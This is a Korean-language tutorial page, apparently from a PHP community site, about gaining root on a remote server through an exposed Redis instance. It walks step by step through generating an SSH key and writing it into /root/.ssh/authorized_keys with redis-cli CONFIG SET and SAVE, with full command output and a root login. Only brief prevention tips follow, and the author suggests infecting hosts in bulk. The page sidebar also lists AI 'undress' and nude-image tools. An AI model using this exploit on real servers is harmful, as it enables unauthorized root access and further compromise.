지역 사회
배우다
도구 라이브러리
AI 도구
여가
찾다
한국어
데이터 베이스 Redis Redis 마이닝의 원리에 대해 이야기해보겠습니다(자세한 예시)

Redis 마이닝의 원리에 대해 이야기해보겠습니다(자세한 예시)

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Feb 23, 2022 pm 05:57 PM
redis

이 글은 Redis의 채굴 원리에 대한 관련 지식을 제공합니다. 여기서는 Redis를 사용하여 원격 서버의 루트 사용자를 확보하기 위해 권한을 승격하는 방법과 이를 보호하는 방법을 설명하겠습니다. 모든 사람.

Redis 마이닝의 원리에 대해 이야기해보겠습니다(자세한 예시)

추천 학습: Redis 비디오 튜토리얼

오늘은 Redis를 통한 권한 상승을 통해 원격 서버의 루트 사용자를 얻는 방법을 보여 드리겠습니다.

1. 먼저 몇 가지 전제 조건이 필요합니다.

  • 조건 1: 먼저 Redis가 있어야 하며 해당 포트[기본값 6379]를 알아야 합니다. 조건 2: Redis 비밀번호는 너무 복잡하면 안 됩니다. , 또는 비밀번호 없음,

  • 조건 3: Redis를 시작하는 사용자는 더 파괴적인 루트 사용자인 것이 좋습니다.

    • 2.1 비밀 쌍을 만듭니다.

키는 ssh-keygen을 통해 생성됩니다. 물론 기존 키를 사용해도 문제 없습니다. 
    root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
    로그인 후 복사
  • 다음으로 공개키를 통해 공격키 값이 생성됩니다

    (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
    로그인 후 복사
    내용은 다음과 같습니다
    root@kali:/tmp/rediskey# cat foo.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
    로그인 후 복사
    여기 앞뒤에 줄바꿈 두 개를 추가하는 목적은 데이터가 서로 연결되어 장애 문제가 발생하는 것을 방지하기 위함입니다.

    • 2.2 Redis에 대한 키 구성

    작업은 다음과 같습니다. 
      root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK
      로그인 후 복사
    • Redis에 로그인하여 Redis에 기록되었는지 확인합니다. 

      root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
      로그인 후 복사
      • 2.3 Redis 저장 메커니즘을 통해 시스템 파일 교체

      다음 작업을 살펴보겠습니다.
        192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit
        로그인 후 복사
      • 이번에는 원격 호스트에 로그인하여 효과를 확인합니다. 

        root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~#
        로그인 후 복사
        자, 이제 권리 에스컬레이션에 성공했으니 내보낸 파일이 무엇인지 살펴볼까요? 사실 Redis의 저장된 파일 형식일 뿐입니다. 관심이 있으신 분은 직접 열어서 보실 수 있습니다. 여기에는 표시되지 않습니다.
        • 3. 예방 방법

        이 취약점은 매우 강력합니다. 이제 호스트 권한이 하나만 있으므로 일부 스크립트를 실행한 다음 일괄적으로 감염시키는 것은 어떻습니까?

        예방 팁은 다음과 같습니다.

        Redis는 위험한 IP에서 모니터링하면 안 됩니다. 그렇다면 방화벽 제어를 추가하세요.

        Redis는 비밀번호 제한을 강화해야 하며, 취약한 비밀번호가 되어서는 안 됩니다.

        Redis는 최대한 피해야 합니다. 루트 사용자로 시작하세요.

        • Redis 채굴을 방지하려면 위의 세 가지 사항을 따르세요. 문제 없습니다.
        • 권장 학습:

          Redis 비디오 튜토리얼

        위 내용은 Redis 마이닝의 원리에 대해 이야기해보겠습니다(자세한 예시)의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

        본 웹사이트의 성명
        본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

        핫 AI 도구

        Undresser.AI Undress

        Undresser.AI Undress

        사실적인 누드 사진을 만들기 위한 AI 기반 앱

        AI Clothes Remover

        AI Clothes Remover

        사진에서 옷을 제거하는 온라인 AI 도구입니다.

        Undress AI Tool

        Undress AI Tool

        무료로 이미지를 벗다

        Clothoff.io

        Clothoff.io

        AI 옷 제거제

        AI Hentai Generator

        AI Hentai Generator

        AI Hentai를 무료로 생성하십시오.

        더보기

        인기 기사

        R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
        1 몇 달 전 By 尊渡假赌尊渡假赌尊渡假赌
        R.E.P.O. 최고의 그래픽 설정
        1 몇 달 전 By 尊渡假赌尊渡假赌尊渡假赌
        어 ass 신 크리드 그림자 : 조개 수수께끼 솔루션
        3 몇 주 전 By DDD
        Windows 11 KB5054979의 새로운 기능 및 업데이트 문제를 해결하는 방법
        2 몇 주 전 By DDD
        Will R.E.P.O. 크로스 플레이가 있습니까?
        1 몇 달 전 By 尊渡假赌尊渡假赌尊渡假赌
        더보기

        뜨거운 도구

        메모장++7.3.1

        메모장++7.3.1

        사용하기 쉬운 무료 코드 편집기

        SublimeText3 중국어 버전

        SublimeText3 중국어 버전

        중국어 버전, 사용하기 매우 쉽습니다.

        스튜디오 13.0.1 보내기

        스튜디오 13.0.1 보내기

        강력한 PHP 통합 개발 환경

        드림위버 CS6

        드림위버 CS6

        시각적 웹 개발 도구

        SublimeText3 Mac 버전

        SublimeText3 Mac 버전

        신 수준의 코드 편집 소프트웨어(SublimeText3)

        더보기

        뜨거운 주제

        Gmail 이메일의 로그인 입구는 어디에 있나요?
        7552
        15
        Cakephp 튜토리얼
        1382
        52
        Steam의 계정 이름 형식은 무엇입니까?
        83
        11
        Win11 활성화 키 영구
        58
        19
        NYT 연결 힌트와 답변
        22
        91
        더보기
        Related knowledge
        Redis 클러스터 모드를 구축하는 방법 Redis 클러스터 모드를 구축하는 방법 Apr 10, 2025 pm 10:15 PM

        Redis Cluster Mode는 Sharding을 통해 Redis 인스턴스를 여러 서버에 배포하여 확장 성 및 가용성을 향상시킵니다. 시공 단계는 다음과 같습니다. 포트가 다른 홀수 redis 인스턴스를 만듭니다. 3 개의 센티넬 인스턴스를 만들고, Redis 인스턴스 및 장애 조치를 모니터링합니다. Sentinel 구성 파일 구성, Redis 인스턴스 정보 및 장애 조치 설정 모니터링 추가; Redis 인스턴스 구성 파일 구성, 클러스터 모드 활성화 및 클러스터 정보 파일 경로를 지정합니다. 각 redis 인스턴스의 정보를 포함하는 Nodes.conf 파일을 작성합니다. 클러스터를 시작하고 Create 명령을 실행하여 클러스터를 작성하고 복제본 수를 지정하십시오. 클러스터에 로그인하여 클러스터 정보 명령을 실행하여 클러스터 상태를 확인하십시오. 만들다

        Redis 데이터를 지우는 방법 Redis 데이터를 지우는 방법 Apr 10, 2025 pm 10:06 PM

        Redis 데이터를 지우는 방법 : Flushall 명령을 사용하여 모든 키 값을 지우십시오. FlushDB 명령을 사용하여 현재 선택한 데이터베이스의 키 값을 지우십시오. 선택을 사용하여 데이터베이스를 전환 한 다음 FlushDB를 사용하여 여러 데이터베이스를 지우십시오. del 명령을 사용하여 특정 키를 삭제하십시오. Redis-Cli 도구를 사용하여 데이터를 지우십시오.

        Redis 명령을 사용하는 방법 Redis 명령을 사용하는 방법 Apr 10, 2025 pm 08:45 PM

        Redis 지시 사항을 사용하려면 다음 단계가 필요합니다. Redis 클라이언트를 엽니 다. 명령 (동사 키 값)을 입력하십시오. 필요한 매개 변수를 제공합니다 (명령어마다 다름). 명령을 실행하려면 Enter를 누르십시오. Redis는 작업 결과를 나타내는 응답을 반환합니다 (일반적으로 OK 또는 -err).

        Redis Lock을 사용하는 방법 Redis Lock을 사용하는 방법 Apr 10, 2025 pm 08:39 PM

        Redis를 사용하여 잠금 작업을 사용하려면 SetNX 명령을 통해 잠금을 얻은 다음 만료 명령을 사용하여 만료 시간을 설정해야합니다. 특정 단계는 다음과 같습니다. (1) SETNX 명령을 사용하여 키 값 쌍을 설정하십시오. (2) 만료 명령을 사용하여 잠금의 만료 시간을 설정하십시오. (3) DEL 명령을 사용하여 잠금이 더 이상 필요하지 않은 경우 잠금을 삭제하십시오.

        단일 스레드 레 디스를 사용하는 방법 단일 스레드 레 디스를 사용하는 방법 Apr 10, 2025 pm 07:12 PM

        Redis는 단일 스레드 아키텍처를 사용하여 고성능, 단순성 및 일관성을 제공합니다. 동시성을 향상시키기 위해 I/O 멀티플렉싱, 이벤트 루프, 비 블로킹 I/O 및 공유 메모리를 사용하지만 동시성 제한 제한, 단일 고장 지점 및 쓰기 집약적 인 워크로드에 부적합한 제한이 있습니다.

        Redis 대기열을 읽는 방법 Redis 대기열을 읽는 방법 Apr 10, 2025 pm 10:12 PM

        Redis의 대기열을 읽으려면 대기열 이름을 얻고 LPOP 명령을 사용하여 요소를 읽고 빈 큐를 처리해야합니다. 특정 단계는 다음과 같습니다. 대기열 이름 가져 오기 : "큐 :"와 같은 "대기열 : my-queue"의 접두사로 이름을 지정하십시오. LPOP 명령을 사용하십시오. 빈 대기열 처리 : 대기열이 비어 있으면 LPOP이 NIL을 반환하고 요소를 읽기 전에 대기열이 존재하는지 확인할 수 있습니다.

        기본 Redis를 구현하는 방법 기본 Redis를 구현하는 방법 Apr 10, 2025 pm 07:21 PM

        Redis는 해시 테이블을 사용하여 데이터를 저장하고 문자열, 목록, 해시 테이블, 컬렉션 및 주문한 컬렉션과 같은 데이터 구조를 지원합니다. Redis는 Snapshots (RDB)를 통해 데이터를 유지하고 WRITE 전용 (AOF) 메커니즘을 추가합니다. Redis는 마스터 슬레이브 복제를 사용하여 데이터 가용성을 향상시킵니다. Redis는 단일 스레드 이벤트 루프를 사용하여 연결 및 명령을 처리하여 데이터 원자력과 일관성을 보장합니다. Redis는 키의 만료 시간을 설정하고 게으른 삭제 메커니즘을 사용하여 만료 키를 삭제합니다.

        Redis의 소스 코드를 읽는 방법 Redis의 소스 코드를 읽는 방법 Apr 10, 2025 pm 08:27 PM

        Redis 소스 코드를 이해하는 가장 좋은 방법은 단계별로 이동하는 것입니다. Redis의 기본 사항에 익숙해집니다. 특정 모듈을 선택하거나 시작점으로 기능합니다. 모듈 또는 함수의 진입 점으로 시작하여 코드를 한 줄씩 봅니다. 함수 호출 체인을 통해 코드를 봅니다. Redis가 사용하는 기본 데이터 구조에 익숙해 지십시오. Redis가 사용하는 알고리즘을 식별하십시오.

        See all articles